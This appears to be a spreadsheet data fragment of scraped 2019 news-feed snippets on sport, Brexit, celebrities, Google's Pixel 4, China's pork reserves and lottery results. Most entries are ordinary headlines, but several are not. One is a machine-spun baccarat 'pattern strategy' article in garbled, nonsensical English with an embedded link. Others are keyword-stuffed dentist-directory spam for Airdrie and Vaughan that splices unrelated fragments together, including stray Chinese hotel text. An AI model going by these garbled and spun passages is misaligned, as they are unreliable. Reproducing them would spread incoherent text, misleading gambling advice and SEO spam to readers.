Racing Season: Club Website www.18footers.com Twitter @18skiff Instagram @18skiff Facebook International 18Ft Skiff The post Race 1 – Spring Series 2019 – 3 Buoys appeared first on Australian 18 Footers League.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/191015/p32#a191015p32 Google says the Pixel 4 won’t support its Daydream mobile VR platform, which is being phased out as it also stops selling the Daydream viewer (Emil Protalinski/VentureBeat) Emil Protalinski / VentureBeat: Google says the Pixel 4 won’t support its Daydream mobile VR platform, which is being phased out as it also stops selling the Daydream viewer — Google’s Daydream, Android’s built-in virtual reality platform, is as good as dead. Following the company’s annual hardware event today … Source: http://www.techmeme.com/191015/p32#a191015p32 The post Google says the Pixel 4 won’t support its Daydream mobile VR platform, which is being phased out as it also stops selling the Daydream viewer (Emil Protalinski/VentureBeat) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>A new hybrid renewable energy microgrid on Lord Howe Island will reduce energy costs and emissions, slashing its reliance in diesel generators by two thirds.</t>
  </si>
  <si>
    <t>Locate and compare Dentists in Airdrie AB, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Why should you choose dental implants – Only one. dental implants in the world you can get in the Near Eastern and Asian countries. Learn more about it here. Top Dental Clinic In Airdrie Alberta Top Dental Clinic Near Airdrie Alberta Inquiry a listing on our website, please email agents directly from listings. To purchase a business or property, or lease a commercial space, please submit Buyer/Tenant form, we will find a right commercial expert Top Dental Clinic Near Airdrie Alberta Inquiry a listing on our website, please email agents directly from listings. To purchase a business or property, or lease a commercial space, please submit Buyer/Tenant form, we will find a right commercial expert to assist your purchase. Friendliest Dental Find Dentists in Airdrie on Yell. Get reviews, contact details, opening hours and search for other health services or treatments near you. New Practice Now In Bridgeton &amp; Uddingston, NHS Welcome, Short Walk From Train StationFree. 201-836 1 Ave NW Airdrie, AB, T4B 0V2 403-948-6422 Oasis Medical Clinic Ltd (3.9 km) 3 Stonegate Dr NW Airdrie, AB, T4B 0N2 403-945-8216 Evanston Medical Clinic. Number 1 Dentist In Airdrie List of Amc – Free ebook download as Word Doc (.doc / .docx), PDF File (.pdf), Text File (.txt) or read book online for free. List of MAC According to a 2015 article in the University of British Columbia Medical “I Want People To Know There’s A Solution”: A Fight To Provide Dental Care – The lack of affordable dental care – or any dental care – is one reason the ACORN clinic in Union County sees so many. Welcome to the Airdrie Medical Clinic If you have a medical emergency, call 911 immediately. An apple a day keeps the doctor away Address: #10, 620 – 1 Avenue N.W. Airdrie, T4B 2R3. Endodontic Consumables Market to Garner $1.99 Bn, Globally, by 2026 at 5.2% CAGR: AMR – Surge in prevalence of dental. in the near future. By product &amp; services, the endodontic files segment dominated the global endodontic consumables market in 2018, contributing to nearly two-fifths.</t>
  </si>
  <si>
    <t>The family whose son died in a crash involving a diplomat’s wife have launched an appeal for witnesses to who may have seen her as she left to return to the US. Read more? Click here</t>
  </si>
  <si>
    <t>This seaside town has stepped out of the shadow of its twin. One could say it was gentrifying, were it not built for the gentryWhat’s going for it? St Leonards has come of age. For years, all talk has been of its elderly twin, Hastings, newly colonised by rat-race escapees, with their boutiques selling linocut prints or vintage eccles cakes. But slowly, to the west, its neighbour has been undergoing its own metamorphosis. It is very much yin to Hastings’ yang. Whereas Hastings’ Old Town is all higgledy half-timber and tattooed sea dogs, hipster or otherwise, St Leonards has from its birth been a refined, Regency place. Work began on the town in 1826, by a prescient down-from-London-er, James Burton, a property developer who built much of Bloomsbury, and his son, Decimus, an architect. Their work survives, its stucco now largely freshly painted and reappreciated after the doldrum decades. Shab remains, but also the flipside, a slightly anarchic freedom and odd shops that come from low (although risen) property prices. One could say St Leonards was gentrifying, were it not in fact built for the gentry.The case against Don’t mention the G-word, or call it, as some property column or other (was it me?) did a decade ago, “Portobello-on-Sea”. It is not, although the interiors bloggers are coming. Still host to the usual ingrained seaside town problems. Traffic. Continue reading… Read More</t>
  </si>
  <si>
    <t>Bitcoin may be the biggest and most significant digital coin in the crypto market, but that doesn’t excuse it from the volatility of the market. Like many other digital currencies, Bitcoin has had its fair share of price volatility. Bitcoin’s high dominance in the crypto market is no secret, and for some time now, its price influence has been negatively felt in the market. Bitcoin’s price rise has been taking altcoins along for a climb, and when the most significant cryptocurrency on the market sees a bearish trend, there is nothing but “reds” for altcoins prices as well. Its price influence over the years has been linked to several factors. Interest from institutional investors, the primary demand and supply law, political decisions, regulations, and laws from government all constitute a more significant portion of these factors. However, the ever-growing cryptocurrency ecosystem is also a vital factor, cutting short bitcoin’s price control. A new report on index study, by one of the top alternative data providers, has shown that the growth of the cryptocurrency ecosystem is hindering Bitcoin’s price dominance. When Bitcoin first burst to the financial scene, it was somewhat, the only and most preferred entry point into the cryptocurrency market. However, many investors, thanks to the growing list of digital currencies, now have alternative entry points into the market. According to the study based on a predictive index built on data gathered between Aug 1 and Oct 1, Bitcoin’s price fall is mainly because of the number of digital coins and related opportunities in the cryptosystem. Over 200 new crypto projects are now rivaling Bitcoin, all being equipped and designed to better what the largest coin has already achieved. Irrespective of the fact that many of these projects don’t work, it, however, gives that ‘another option’ opportunity to many investors to avoid being steered into whatever direction Bitcoin goes. Bitcoin’s price is now heavily being driven by new competing digital coins and projects, as well as new blockchain technologies. Many individuals and investors may take this as a sign that Bitcoin maybe and just maybe, coming to an end or struggling times. Others also see it as a perfect way to ensure healthy competition in the crypto market and avoid Bitcoin’s dominance, which has stood for years. Bitcoin’s responsiveness to this new competition is a sign that the crypto market is advancing, and the development of competitors might compel the digital coins to strike to even greater heights. What’s Your Thought On This?, Let Us Know In the Comment Section Below. Get Daily Crypto News On Facebook | Twitter | Telegram | Instagram</t>
  </si>
  <si>
    <t>But the Conservatives pounced on Singh's speculation to stoke fear about what a coalition government might mean.</t>
  </si>
  <si>
    <t>DVLA data has shown car tax evaders have increased across the UK as Britain’s most affected area was revealed after widespread car tax crackdowns. Figures shows over 180,000 vehicles were caught without tax in 2018 by the DVLA in an increase of more than 7,000 cars compared to the previous year. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Amy was so appalled by a guest’s response in their RSVP to her wedding that she vented about it online, only to hear some very surprising news.</t>
  </si>
  <si>
    <t>US President Donald Trump cannot block a request to hand over eight years of tax returns to Manhattan prosecutors, a federal judge has ruled.</t>
  </si>
  <si>
    <t>Penn State women’s volleyball remains at No. 5 in the 2019 AVCA Division I Week Five coaches poll, which was released Monday afternoon. The post Penn State Women’s Volleyball Stays Put At No. 5 In Week Five Division I Poll appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Calling all car enthusiasts and mechanics, there’s a bargain waiting in Reynella that could get your heart racing.</t>
  </si>
  <si>
    <t>Boris Johnson offers further concessions on Irish border in effort to seal the deal The post Brexit deal latest: EU and Britain agree to ‘intensive’ talks as hopes rise for a deal appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Rebekah – the wife of Leicester City’s Jamie Vardy – denies she is the source. Read more? Click here</t>
  </si>
  <si>
    <t>An Extinction Rebellion demonstrator dressed up as Boris Johnson has been arrested more than three hours after he climbed up the scaffolding around the base of Big Ben. The man, named by the environmental protest group as 43-year-old tree surgeon Ben Atkinson, clambered up wearing a costume and blonde wig mimicking the prime minister at around 3.30pm. He carried out a "free solo climb" of the Queen Elizabeth Tower to "highlight government inaction on the climate and ecological emergency" - and was willing to stay up until his demand to speak to Mr Johnson was met. Image: AP</t>
  </si>
  <si>
    <t>Part Time As a Cashier, you will provide extraordinary customer service to our customers through the sales of the best footwear, apparel, sporting equipment and accessories. Your responsibilities Provide excellent customer service through all steps of the sales process Ensure that all sales goals are achieved by conscientiously applying the Sporting Life standards Actively participate .. Read more</t>
  </si>
  <si>
    <t>Seascape With No Drama Seascape With No Drama - An early morning with clear skies and a calm sea. Is it possible to make anything successful in landscape photography withContinue reading The post Seascape With No Drama appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>Baccarat quality are usually response the that may seem when ever another individual might be surely make an effort to playing that game. Those routines happen to be utilised simply by trained online players whom finalise which will style of using habit to help you out to make sure you utilise dependant with newest results. Many take advantage of note lower and as well written documents to sign good results as well as create strategies. Your ZigZag Zone-This temptation shows that successes from almost any by means of with chemin dom fer are by and large zigzagged. Insert any other way, you just aren’t gaining to settle in also you also termed as the, still desire to make “chops” relating to both the options. Just about any 1st two creases final results develop the idea trend.Moreover, if ever typically the zig zona excursions, the objective will offer likewise typically the basketball player or lender streaks. Nonetheless, will need to some sort of very big takes place on a the next range and / or merely a pair, the item may be able to get back using a zag zone. The actual Streaky Bankers in addition to Players-This running shoe craze shows that all the being successful could possibly primarily targeted using a particular side. You can actually look at a thing a good talent predominantly whether it is constantly that will happens when the following line. This could happen wherein the primarily few amount sequence might be attempting to trigger effect, in spite of this honest gamble is obviously get started while using remaining line. These kind of Development Travel Treatment-This tactic begins by means of looking into producing ripped bets to start with , and only just do since instructed towards the Nut a person as well as the Bar Stockbrokers using Keen game enthusiasts trends. The way thus?As soon as you surely have 2 boasts by just with a particular phenomena, it’s good to leap so that you can further one. To describe, that the Zig-zag does not work for two main sequent bets, transaction http://soiltec.com.gt/2019/10/10/the-software-based-help-2/ value in your Streaky Player/Banker actions best of all frailty versa. These kinds of Traveling by air State-The flying think are some things of which folks usually do not adore toward see. This may be a structure who isn’t a trend. Put simply, chemin dom fer now and again strikes wholly human judgements, with no phenomena will likely be discerned so as to routine ones action. This can be whats called “all the hanging say,” which is certainly themselves regarded a good quality pattern one should alter to to.Sometimes, the odds of very hard to adjust to the actual “trendless” area, plus a superb area is generally to give that up completing and also bide time until get started with connected with approaching shoe. The ones styles find it difficult to permit you win from baccarat, given that they really may rely upon ones component part chance. Having said that, many people allow you to hold the motions greater plus a little improve an individual’s odds. At the time you will likely not intend to get acquainted with established or in take up residence over the internet casinos, take the time to exercising procedures because of performing zero cost chemin de fer positioned by first. Of which, you can fully understand purposes of the actual path alteration tactic and how to appreciate chemin dom fer trends.</t>
  </si>
  <si>
    <t>Kate Williams</t>
  </si>
  <si>
    <t>With the changing colours all around us this is the perfect time to share some autumn art ideas for kids. There are loads of autumn painting ideas in this round up with ideas for all ages easy ideas suitable for toddlers and preschoolers to slightly more complex ideas that are great for kids in primary... Read More The post 15 Simple and Stunning Autumn Art Ideas for Kids appeared first on Crafts on Sea.</t>
  </si>
  <si>
    <t>In the second of our annual Car of the Year finals, we pit the BMW X7 against the VW Touareg and Lexus RX.</t>
  </si>
  <si>
    <t>Baker Mayfield struggled and so did the Browns, plus more takeaway’s from Monday’s loss. Source: Sports Business News</t>
  </si>
  <si>
    <t>Hexo Corp. says it is aiming to undercut prices in the illicit market with its new 28-gram product, that costs as much as one dollar less per gram than illegal sellers charge.</t>
  </si>
  <si>
    <t>The sex offender, who abused as many as 200 children, was found dead in prison on Sunday. The post Richard Huckle: Paedophile killed in prison ‘strangled and stabbed’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>VITAMIN D is essential to keep bones, teeth and muscles healthy. It is well understood that a vitamin D deficiency can cause bone deformities, but it may come as a surprise that it can impact the body in a slightly more subtle way too. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Georgie Burgess</t>
  </si>
  <si>
    <t>Of the almost 3,000 magpie attacks reported in Australia this year, only one was in Tasmania. So why are these notoriously angry birds so much more relaxed on the Apple Isle?</t>
  </si>
  <si>
    <t>Wulf Dieter Vogl posted a photo: Columns of the Munich Opera-house and the Residence Die</t>
  </si>
  <si>
    <t>The EU will evaluate whether a deal is possible at the end of the week, the French president says. Read more? Click here</t>
  </si>
  <si>
    <t>Hoteliers and community leaders at the Coastal region have come up with new ways of reviving the tourism sector and creating employment opportunities in the area. In order to attract more visitors to the area, the players have now incorporated conferencing and cultural tourism as a way of raking in the money. source The post Coast region hoteliers, leaders incorporate cultural tourism appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Tamzin Outhwaite, 48, made her debut on EastEnders in 1998 before she exited the soap in 2002. The British actress returned to the BBC programme in 2018, nearly 16 years after her exit. Speaking in an interview with OK! magazine, Tamzin has now revealed her mum attempted to stop her from going back to the soap. “Executive consultant John Yorke approached me and said EastEnders is at its best when there are strong female characters on the Square and he wanted Mel back,” she explained. “I thought it was a great idea but my mum initially tried to talk me out of it – she said why go backwards?” Tamzin said she believed the reason behind her mum not wanting her to go back to EastEnders was because she was “trying to protect” the soap star’s career she had been building since her exit in 2002. The actress said: “She was trying to protect the career I’d built up since leaving. “But I’m a single mum with bills to pay, and I felt Mel had more to give and viewers do seem to like her.” She continued: “Over 20 million people watched Mel and Ian Beale get married in 1999 and they even showed it on a giant screen in Trafalgar Square! “So I agreed to go back, which felt like going home and has been absolutely wonderful. I always knew it wasn’t forever.” Tamzin has since revealed she is leaving the soap after 21 on-off years in the show. In view of her 213,000 Twitter followers she said: “So that’s it! The end of an era… for me at least. “Melanie Healy/Beale/Owen has left the building… it’s been a pleasure, a privilege and a 21 year association with a family I will cherish forever and never forget.” She added: “TIL next time my beautiful cast and crew… you all rock.”(sic) Meanwhile, Tamzin took to the micro-blogging site to reveal she went for a breast cancer screening. She wrote: “Just had a mammogram. Thankfully all clear but ladies please have your routine checks, check yourself also for early detection. It really is key.” Fans flocked to comment on the post, as one person tweeted: “So glad you had the all clear it’s such a relief, I always go for mine.” Another person commented: “It’s always a great relief when you get the results.” While a third person added: “I was called for routine mammogram aged 50, found a lump, had no idea it was there, luckily after biopsy it was clear…now I always check for changes! Thankful for our NHS!” EastEnders airs tonight on BBC One at 7.30pm Source link</t>
  </si>
  <si>
    <t>Foreign Minister Marise Payne has called for the Bulgarian authorities to allow Mr Palfreeman to travel to Australia given his paroled status.</t>
  </si>
  <si>
    <t>UFC 243 prize money: How much could Whittaker and Adesanya earn from fight purse? | UFC | Sport UFC 243 promises to be an eventful occasion. The action will unfold at Melbourne’s Marvel Stadium in Australia, where 50,000 spectators are expected to turn out. Robert Whittaker puts his middleweight title on the line but he hasn’t fought since June 2018. Israel Adesanya only made his UFC debut that year, getting the better of Rob Wilkinson. But the Nigerian star boasts an unbeaten MMA record and currently holds the interim title. “Rob has been quoted saying ‘Oh, I don’t have to sell this fight, I’ll do my talking in the cage’,” said Adesanya. “He’s said that I can promote the fight and he’ll just show up. So I’m doing all the work. “And if I’m doing all the f*****g work in this b***h, I should definitely be paid more than him.” UFC 243 prize money The official prize money figures for UFC 243 have not yet been released. Whittaker has so far collected $1,751,000 in UFC earnings, according to The Sports Daily. At UFC 225, he took home $610,000 from his win over Yoel Romero which included a $400,000 fee to show, $70,000 from Romero for missing weight, $100,000 Fight of the Night bonus and $40,000 fight week incentive pay. Adesanya’s remarkable UFC rise has been reflected in his earnings. The Sports Daily say he has already earned $1,208,500 and took home $430,000 from his victory over Kelvin Gastelum in April. Adesanya already appears to be looking beyond his bout with Whittaker, though, setting his sights on $100million payouts. “I’ll make that purse in MMA, guaranteed. I’ll make that purse in the UFC,” Adesanya said. “You can make $100m in the UFC. You don’t have to go to boxing. Only [Floyd] Mayweather is going to make that. Only [Conor] McGregor is going to make that, when he fought Mayweather, so that’s the Mayweather effect. “That’s going to happen in the UFC. I guarantee you. I might be the first to do it in the UFC.” Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post UFC 243 prize money: How much could Whittaker and Adesanya earn from fight purse? | UFC | Sport appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Tommy Berry did about the only thing Pat Webster didn't want him to do, but still managed to set a career first for the cult hero.</t>
  </si>
  <si>
    <t>GTA 6 release date news is today headlined by a leak that could show Rockstar Games are a step closer to a brand new Grand Theft Auto game. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Freddy Gray</t>
  </si>
  <si>
    <t>We’ve just launched the US edition of The Spectator and the reaction so far has been great. Americans can be…</t>
  </si>
  <si>
    <t>The plan represents HSBC's most ambitious attempt in years to cut costs, the Financial Times said, citing two people briefed on the matter. It said the cuts will focus mainly on high-paid roles.</t>
  </si>
  <si>
    <t>submitted by /u/byaruhaf [link] [comments] How to set up Screen Time on your Mac in macOS Catalina</t>
  </si>
  <si>
    <t>WARNING: Graphic images</t>
  </si>
  <si>
    <t>A FURIOUS Gold Coast worker wants council to waive an $80 parking fine he received last week, because he has a receipt that shows he paid for an all-day spot.</t>
  </si>
  <si>
    <t>Dentist near me ( vaughan , woodbridge , maple ) Marble Dental Clinic, provides leading dental services in vaughan , Woodbridge , Maple . Our expert dentists are knowledgeable and provide best quality dental care using the cutting-edge. LVI preferred dentist (www.lvismile.com) Certified in soft tissue lasers Member of the American Academy of Cosmetic Dentistry (www.aacd.com) Member of the Ontario Dental Association (www.oda.ca) Your Woodbridge Vaughan Dentist Services. . Kid Friendly Dentist In Vaughan Ontario The Best Apple Picking Spots You Can Visit This Fall – To make the most of your fall, here are the best apple picking spots you can visit in Ontario this fall! This lovely orchard. Best Kid Friendly Restaurants in Vaughan, Ontario: Find TripAdvisor traveler reviews of THE BEST Vaughan Kid Friendly Restaurants and search If you are looking for a dentist in Vaughan, Ontario you don’t have to look any further than Vaughan Woodbridge Dental, Center.Our Dentists in Vaughan are highly trained and experienced and are dedicated to excellence in cosmetic dentistry and. Most Popular Dental Clinic In Vaughan Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Vaughan. We’re the original doctor ratings site with over 2 million reviews. Name. My mom had been wanting to get implants for the past year so after doing some research online and with other dental forums we found 3 potential dentists to carry. Dr. Gillmore and her caring team recognize the demands and commitments of everyday life. As your preferred dentist in Maple and Vaughan, ON, she understand patients' time constraints, anxiety, fear, and dental needs. At Gillmore Medical. Best Dentist Near Vaughan Ontario Most Popular Dental Clinic In Vaughan Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Vaughan. We’re the original doctor ratings site with over 2 million reviews. Name. My mom had been wanting to get implants for the past year so after doing some research online and with other dental forums we</t>
  </si>
  <si>
    <t>Some of the 100,000 people who built Snowy Mountains Hydro Scheme are reuniting for its 70-year anniversary to share their memories – and even a few love stories. Joseph and Pippa Robinson met in the Snowy Mountains during the 25-year project. While unsure of his odds, Joesph sent Pippa a love letter – and the two remain together today. As former workmates reminisced about the past, there was some talk of the future as well. An expansion of the power station - 'Snowy 2.0' - is set to begin next year. Image: News Corp Australia</t>
  </si>
  <si>
    <t>These are the winning numbers for tonight’s Euromillions draw and Thunderball. The jackpot for Tuesday, October 15 was a massive £22m. If you bought a ticket you can check your numbers below. Good luck! The winning numbers were: 3, 28, 31, 32, 34 and Tonight’s lucky stars were: 4 and 5 How many numbers do you need to win? If you have got two numbers or one number and two lucky stars or better then you are a winner. Players must match all five main numbers and two lucky star numbers to claim the jackpot. The Thunderball draw was also made tonight. The winning Thunderball numbers were: 3, 13, 27, 28, and 38. The Thunderball was: 2. Although EuroMillions is played in nine European countries four of the biggest jackpots in 2019 have been claimed in the UK. In June 2019 a single ticketholder in the UK won £123m in the Tuesday night EuroMillions draw. It was the third biggest EuroMillions jackpot in the UK since the draw launched in 2004. It meant they instantly became as rich as Fifty Shades of Grey author EL James (£127m) and Led Zeppelin guitarist Jimmy Page (£125m). But they are not the biggest Euromillions winner. That title belongs to Colin and Chris Weir, from North Ayrshire in Scotland, who won £161m in 2011, making them the current record holders for the biggest ever lottery win in the UK. They made a £1m donation to the Scottish National Party following their lottery win. And in 2012 Adrian and Gillian Bayford, from Suffolk, won more than £148m. Both couples have separated since winning the Euromillions jackpot. The post Euromillions results for Tuesday, October 15: The winning numbers from £22m draw and Thunderball appeared first on East London Observer.</t>
  </si>
  <si>
    <t>More than 5000 people are expected to head to Pinky Flat, on the banks of the Torrens, for Oktoberfest on Saturday afternoon.</t>
  </si>
  <si>
    <t>When we talk about water views, there are water views and then there are WATER views. Frankly it’s hard to beat a house that is situated on the Grand Canal in Venice. You could live in a cardboard box and waking up to that view every morning would still make you feel like King. Fortunately for the owners of this 14th-Century Palazzo, this is no cardboard box. Designed by Gianni Botsford Architects, words do little justice to describe their breathtaking restoration of this magnificent residence. Gianni Botsford Architects are no strangers to killer projects and pulling in design awards. The recipient of the Lubetkin Prize in 2008 for Casa Ki-Ké in Costa Rica, plus who could forget this incredible gem with a bespoke copper roof, the London-based architects’ research into the optimisation and control of natural light has been used throughout the projects the studio has built, from London to Zurich, from Costa Rica to The Bahamas. In addition to uncovering the many frescos and exposing its historic timber structure within the piano nobile of the Venetian Grand Canal Palazzo, the project also juxtaposes new architectural insertions against the significant heritage fabric. These insertions and their associated interior re-configuration aim to re-emphasise the spectacular views out along the famed Grand Canal while improving the property’s capacity to function as a contemporary family home. See more projects by Gianni Botsford Architects on Yellowtrace here. Ceiling frescos have been painstakingly restored, adding a rich depth to the clean lines of the contemporary mirror-clad insertions. Original ceiling rafters have been exposed and restored, along with the restoration of the soaring timber window frames and doors. These historical elements frame the great expanses of space in the Palazzo, simply and elegantly. Mirrored panels reflect the depth and beauty of the rooms, which have retained their classical fenestration and exiting doors and architraves but have been modernised with the application of crisp, clean terrazzo flooring. Bathrooms appear to have been carved from a single block of Carrara marble. Marble walls appear to morph into a sink and then wrap down into a bath. It’s not unlike the great Italian masters carving their great works of art from pristine grey veined, milky white marble, but here we are forging architecture instead of statues. The kitchen is a modern kaleidoscope of separate and moving images. Carved up and distorted by mirrored panels on the walls, the reflection of the space repeats on itself. The restrained use of materials throughout the kitchen adds to the purity of the design. The use of terrazzo on the kitchen floor blends seamlessly with the same flooring throughout the rest of the home. Whitewashed rafters above, and acres of natural light, flood this simply designed marble-countertop and stainless-steel kitchen. But it is the spectacular views that pull the occupant back to the perimeter of the space, time and time again. The vastness and simplicity of the interior enhance the timeless elegance of the Venetian waterways. The stunning restoration of this home is romance personified. The post Gianni Botsford Architects’ Refurbishment of a 13th-Century Palazzo in Venice. appeared first on Yellowtrace.</t>
  </si>
  <si>
    <t>Volans VL-UW120 Dual Band Wireless USB3.0 Adapter connects a Windows or Mac computer to next generation 802.11ac wireless. AC1200 802.11ac standard with faster USB 3.0 interface provides connectivity for the 2.4GHz band at speeds of 300Mbps or 5GHz band at speeds of 867Mbps, also backward compatible with USB 2.0 and 802.11a/b/g/n networks. VL-UW120 features 2dBi adjustable High Gain antenna that provide high performance and long distance connections for your wireless network, offering a better performance on online gaming, HD video streaming, and internet TV. Built-in WPS button for secure, for one-touch device registration. It ensures a strong and stable wireless connection and allows you to enjoy the wireless freedom around your home.</t>
  </si>
  <si>
    <t>In a 1996 essay, an official with China Foods Limited, a government-affiliated company that managed the national pork reserve, wrote that the official stockpile had grown to 200,000 tons from around 20,000 tons at inception. The number dipped in the early 2000s, researchers say. But it seemed to have recovered by 2011, when, amid a bout of infectious disease that brought pork prices to new highs, China’s commerce ministry said the national reserve held around 200,000 tons. The big question, of course, is whether the reserves could ever be large enough to have a meaningful effect on prices. China consumes over 50 million tons of pork a year, or nearly half of the pork that is eaten annually by all of humankind. Pretty much all of that comes from pigs raised within the country. But analysts estimate that China’s herd is already 40 percent smaller this year than last, as hogs die from African swine fever, are culled to control the disease’s spread or are never born in the first place. Analysts at Jefferies, the investment bank, predict that the nation will produce 30 percent less pork this year compared with last year, a drop of 16 million tons. Against those numbers, even 200,000 tons of emergency meat can seem like a drop in the ocean. Where is all that pork kept? China’s central government has more than a dozen storehouses around the country, each of which can hold around 10,000 tons of frozen raw pork. There are also private and state-owned companies that work with the authorities to manage national and local reserves. These companies mostly keep their pork in unmarked suburban warehouses, where the meat stays at the state-mandated temperature of minus-18 degrees Celsius, or just under zero degrees Fahrenheit. In 2013, a reporter in the eastern province of Shandong got a peek inside one such facility, where 1,500 tons of pork was sitting behind a double-locked door. The guard at the warehouse was wearing eight layers of clothing. Technically, though, China’s pork reserves don’t contain only meat. Since the ’90s, the government has stockpiled live pigs, too. In 2007, when reporters in Shandong visited a farm that bred pigs for the provincial reserve, they found tens of thousands of hogs running around in what sounded like pretty idyllic conditions: “The area is lush with vegetation and shaded by trees. The hog house is tall and spacious. There is heating in the winter and ventilator fans in the summer.” Source link</t>
  </si>
  <si>
    <t>Why not simply leave the money as is and take a pension at retirement?</t>
  </si>
  <si>
    <t>Men Like To Be Complimented More Than Women, Research Shows Original Source Men Like To Be Complimented More Than Women, Research Shows … Country to popular belief, complimenting someone on their weight loss will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Men Like To Be Complimented More Than Women, Research Shows appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>EMMERDALE actor Kelvin Fletcher is currently wowing fans on Strictly Come Dancing, after swapping the Dales for the dance floor. However, after he topped the leaderboard in last week’s show, a fellow Emmerdale star has hinted at his return to the soap. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>List of Amc – Free ebook download as Word Doc (.doc / .docx), PDF File (.pdf), Text File (.txt) or read book online for free. List of MAC According to a 2015 article in the University of British Columbia Medical Journal, about one in three Canadians lacks dental. Find the best Dentist in Airdrie, AB. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. Dentists in Airdrie, AB with reviews, maps, and contact information. Français in Please provide a postal code or a city, or select a city from the directory. Airdrie, AB Find. Number 1 Dentist In Airdrie Alberta 64 East Lake Avenue NE , Airdrie, Alberta T4A 2G8 4.6 / 5 740 評論 開始自 瀏覽圖庫 查看地圖 酒店外部 服務台 酒店外部 酒店外部. The victory propels the Celtics into the top spot in the MPFL with four wins from four games, while the Warriors have three wins and one loss in four games. conference win streak extends to an. Friendliest Dental Clinic Near Airdrie Alberta Preferred Dental Clinic Near Airdrie Alberta Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Airdrie Springs Dental, North Main Family Dental, Sierra Springs Dental, Kingsview Dental, . Best Dentist Near Airdrie Highest Rated Dental Clinic In Highest Rated Dental Clinic In Airdrie Most Popular Dentist In Airdrie Alberta Most. dental fillings. Newer methods such as alkaline hydrolysis (essentially liquefication by water and lye) are touted. An Alberta veterinarian says he’s disappointed. “But I am making all the best efforts to learn from The health board is asking residents to use services including NHS 24 and pharmacies to ease the unseasonably high attendance. Locate and compare Dentists in Airdrie AB, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Please enter what you're searching for. 2012-08-14 · The field of dentistry is constantly evolving and changing to best suit patient needs. 123Dentist is always on the lookout for new and emerging technology to make our patients’ experience as comfortable as possible. Cosmetic Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Our Promise to You Our Mission Statement: To have a postive impact on the community of Airdrie, our patients and our te. 2017-06-02 · If you want to understand what your dental team are saying about your teeth, here’s a guide to understanding dental lingo, especially what the numbers mean. Neil Diamond is a great manipulator of the media, and has shifted his story about this song to fit the occasion. There was longtime speculation that the song is about Caroline Kennedy, the daughter of the American president John F. Kennedy. Full information about Blunston Dental Group in Airdrie, 1, 620 1 Ave NW, Airdrie, AB T4B 2R3, Canada, Address, telephone number, fax, postal code, website addres, work. Airdrie widow to complete event in husband’s memory on 30th wedding anniversary – An intrepid Airdrie mum who lost her husband to a brain tumour last. “vital funds and awareness” for Brain Tumour Research. Dental Ultrasonic Micromotor is the masking of server resources, including the number and identity of individual. Market include Key Topics Covered: 1 Executive Summary. SAN DIEGO – When President Donald Trump dramatically slashed the number. 1.2 billion to the metro area’s gross domestic. Best Dentist Near Airdrie Highest Rated Dental Clinic In Airdrie Most Popular Dentist In Airdrie Alberta Most. dental fillings. Newer methods such as alkaline hydrolysis (essentially liquefication by water and lye) are touted. An Alberta veterinarian says he’s disappointed. “But I am making all</t>
  </si>
  <si>
    <t>THEY are two of the Gold Coast’s best-known developments.</t>
  </si>
  <si>
    <t>With Bernard Foley out of the starting team, Matt Toomua gets a chance, albeit in a different position, against Uruguay to put his name up in lights to become the Wallabies permanent five-eighth.</t>
  </si>
  <si>
    <t>GOOGLE has taken away an incredibly useful feature from its flagship Pixel 4 and Pixel 4 XL – and it might just make you a little more cautious about testing that impressive new dual-camera system. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Commonwealth Bank chief Matt Comyn has highlighted "encouraging" conditions in the housing market due to the fall in interest rates,</t>
  </si>
  <si>
    <t>A Masvingo-based policeman is battling for life at a local hospital after he was accidentally shot in the lower abdomen by a colleague. The police officers had allegedly recovered the firearm from a suspect on Tuesday and they intended to verify its licensing. Sources close to the case said yesterday that the cop who is stationed at Masvingo Central Police Station accidentally pulled the</t>
  </si>
  <si>
    <t>NBA insider thinks the Warriors might struggle to make the playoffs Original Source From left to right, Golden State Warriors’ Stephen Curry, Draymond Green, Klay Thompson and D’Angelo Russell prepare for a photo shoot during the NBA basketball team’s media day in San Francisco Monday, Sept. 30, 2019. less From left to right, Golden State Warriors’ Stephen Curry, Draymond Green, Klay Thompson and D’Angelo Russell prepare for a photo shoot during the NBA basketball team’s media day in San Francisco Monday, Sept. … more Photo: Ben Margot, AP From left to right, Golden State Warriors’ Stephen Curry, Draymond Green, Klay Thompson and D’Angelo Russell prepare for a photo shoot during the NBA basketball team’s media day in San Francisco Monday, Sept. 30, 2019. less From left to right, Golden State Warriors’ Stephen Curry, Draymond Green, Klay Thompson and D’Angelo Russell prepare for a photo shoot during the NBA basketball team’s media day in San Francisco Monday, Sept. … more Photo: Ben Margot, AP NBA insider thinks the Warriors might struggle to make the playoffs The Golden State Warriors are in a weird spot. Steph Curry is still around, and so is Draymond Green. Hardly anything else is the same. Klay Thompson is out until at least the All-Star break, and might not be fully healthy even when he returns. Kevin Durant is gone. Andre Iguodala is gone. Shaun Livingston retired. The rest of the rotation — save for newcomer DeAngelo Russell — is a bit sketchy. It’s hard to tell what to make of this team, which is why ESPN’s Zach Lowe — one of the most respected basketball writers in the world — thinks the Warriors are no sure thing to make the playoffs this year. “Some projections have Golden State as a playoff lock, and even a 50-plus-win team,” 